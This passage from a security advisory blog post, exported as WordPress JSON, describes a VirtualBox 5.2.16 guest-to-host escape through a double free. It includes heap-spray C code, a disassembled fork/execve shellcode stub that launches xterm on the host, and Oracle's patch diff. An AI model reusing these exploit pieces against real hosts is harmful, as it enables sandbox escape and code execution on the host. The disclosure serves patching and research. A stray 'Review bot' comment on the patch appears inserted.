class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-57\"><span class=\"crayon-cn\">0x7f83cfd4f650<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-58\"><span class=\"crayon-cn\">0x7f83cfd4f660<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-59\"><span class=\"crayon-cn\">0x7f83cfd4f670<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-60\"><span class=\"crayon-cn\">0x7f83cfd4f680<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-61\"><span class=\"crayon-cn\">0x7f83cfd4f690<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-62\"><span class=\"crayon-cn\">0x7f83cfd4f6a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span 
class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-63\"><span class=\"crayon-cn\">0x7f83cfd4f6b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-64\"><span class=\"crayon-cn\">0x7f83cfd4f6c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-65\"><span class=\"crayon-cn\">0x7f83cfd4f6d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0106 seconds] -->  <\/p>\n<p>Here is the main part of the heap sprayer. 
It creates 64 displays; for each one it first submits 16384 (1024 * 16) buffers, each of which the host turns into a 0x2F8-byte heap chunk holding the alternating rop_1 \/ vram_ptr pattern shown in the dump above, then creates the display (an H3DORInstance) with a flip command and pauses for half a second before the next round.<\/p>\n<pre><code>for (uint32_t i = 0; i &lt; 64; i++) {\n\tuint32_t currentBufferSize = 0x2F8;\n\n\t\/\/ We reinitialize the content of the buffer on each iteration not because it becomes dirty\n\t\/\/ but because without it the spraying is too fast and many of the submitted buffers\n\t\/\/ are just ignored.\n\tfor (uint32_t j = 0; j &lt; 1024 * 16; j++) {\n\t\t\/\/ Chromium command header: EXTEND opcode at byte 3, sub-opcode at +8\n\t\t*(pData + 3) = CR_EXTEND_OPCODE;\n\t\t*(uint32_t*)(pData + 4) = 0; \/\/ unused\n\t\t*(uint32_t*)(pData + 8) = CR_PROGRAMNAMEDPARAMETER4DVNV_EXTEND_OPCODE;\n\t\t*(uint32_t*)(pData + 12) = 0xFFFFFFFF; \/\/ id\n\t\t*(uint32_t*)(pData + 16) = currentBufferSize; \/\/ len: size of the payload that ends up in the 0x2F8 chunk\n\t\t*(uint64_t*)(pData + 20) = 0; \/\/ params[0]\n\t\t*(uint64_t*)(pData + 28) = 0; \/\/ params[1]\n\t\t*(uint64_t*)(pData + 36) = 0; \/\/ params[2]\n\t\t*(uint64_t*)(pData + 44) = 0; \/\/ params[3]\n\t\t\/\/ Payload: alternate the ROP gadget address and the pointer into mapped VRAM\n\t\tconst uint32_t bufferOffset = 52;\n\t\tbool spraySelector = 1;\n\t\tfor (uint32_t off = bufferOffset; off &lt; bufferOffset + currentBufferSize; off += sizeof(uint64_t)) {\n\t\t\tif (spraySelector) {\n\t\t\t\t*(uint64_t*)(pData + off) = rop_1;\n\t\t\t} else {\n\t\t\t\t*(uint64_t*)(pData + off) = vram_ptr;\n\t\t\t}\n\t\t\tspraySelector = !spraySelector;\n\t\t}\n\n\t\t\/\/ Hand the buffer to the host over HGSMI\n\t\tint rc = VBoxHGSMIBufferSubmit(guestCtx, pShgsmiHdr);\n\t\tif (!RT_SUCCESS(rc)) {\n\t\t\treturn STATUS_UNSUCCESSFUL;\n\t\t}\n\t}\n\n\t\/* Create H3DORInstance (display) *\/\n\tMySendCrCmdFlip(pDevExt, pContext, hostId, i);\n\n\t\/\/ Pace the spray so the host keeps up with the submitted buffers\n\tRTThreadSleep(500);\n}<\/code><\/pre>\n<p>  <!-- [Format Time: 
0.0126 seconds] -->  <\/p>\n<p><b>Shellcode and Process Continuation<\/b><br \/> When the ROP gadget is reached, execution is redirected into the shellcode, which sits in guest VRAM mapped into the host VM process. Disassembled with gef at the point where control arrives, the stub is a fork-and-execve launcher with a continuation path. It issues fork (rax = 0x3a). In the child (rax == 0) it stores the path pointer into an argv array and a second string pointer into an envp array with rip-relative stores, loads the path, argv and envp addresses into rdi, rsi and rdx, and issues execve (rax = 0x3b). In the parent (rax != 0, which also covers a failed fork) it jumps to 0x7f8478000048, where it loads the qword at rsp+0x1c8, raises rbp by 0x2b0 and rsp by 0x1d0, sets rax to 0 as a success return value, and finishes with push rdi; ret. Since rsp+0x1d0 minus the 8 bytes pushed is exactly the slot the value was loaded from, this behaves like a normal return from the hijacked frame, so the VM process keeps running instead of crashing. The three constants are specific to the layout of that frame:<\/p>\n<div id=\"crayon-5b7b3e582f57a314480658\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">19i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-2\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7f8478000000<\/span><span 
class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3a<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000007<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">syscall<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000009<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">test&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-i\">rax<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-5\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800000c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">jne<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x7f8478000048<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800000e<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x4e<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 
0x7f8478000063<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-7\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000015<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x6b<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000087<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-8\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800001c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x57<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f847800007a<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-9\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000023<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span 
class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x6d<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000097<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800002a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x32<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000063<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000031<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x4f<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000087<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000038<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span 
class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x58<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000097<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800003f<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3b<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000046<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">syscall<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-15\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000048<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rsp<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1c8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000050<\/span><span 
class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x2b0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-17\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000057<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rsp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x1d0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800005e<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">xor<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-i\">rax<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000061<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">push&nbsp;&nbsp; <\/span><span class=\"crayon-i\">rdi<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000062<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">ret<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0165 seconds] -->  <\/p>\n<p>The shellcode does fork+execve to spawn xterm in the child process. 
To continue execution of the virtual machine, RBP and RSP must be adjusted so that the final RET returns to the svcHostCallPerform function, where the RDP connection closure was initiated. The shellcode does this by adding 0x2B0 to RBP and 0x1D0 to RSP.<\/p>\n<p><strong>Patch<\/strong><br \/> Oracle fixed the vulnerability by moving the function call that caused the double free out of the loop:<\/p>\n<pre>--- VirtualBox-5.2.16\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp\n+++ VirtualBox-5.2.18\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp\n@@ -326,10 +326,10 @@\n             WARN((&quot;err&quot;));\n             break;\n         }\n-\n-        CrFbVisitCreatedEntries(mpFb, entriesDestroyCb, this);\n     }\n \n+    CrFbVisitCreatedEntries(mpFb, entriesDestroyCb, this);\n+\n     return rc;\n }<\/pre>\n<p>If you are interested in viewing the full source code of the exploit, we would be glad to send it to you. 
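<\/p>\n<p>Review bot: the hunk gives no hint why CrFbVisitCreatedEntries(mpFb, entriesDestroyCb, this) must run exactly once, so a later reader of display_base.cpp could move the call back into the loop and reintroduce the double free; add a comment above the relocated call stating that entriesDestroyCb releases the created entries and must therefore be invoked once, after the loop, never per iteration. Note also that the relocated call is unconditional, so it now executes even when the loop is left through the break that follows the WARN error path; please confirm that destroying the entries on that path is intended.<\/p>\n<p>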
Email us at: ssd[at]beyondsecurity.com.<\/p>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3736\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15244,10757,13145],"class_list":["post-13153","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-sandbox-escape","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13153","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13153"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13153\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13153"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13153"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13153"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}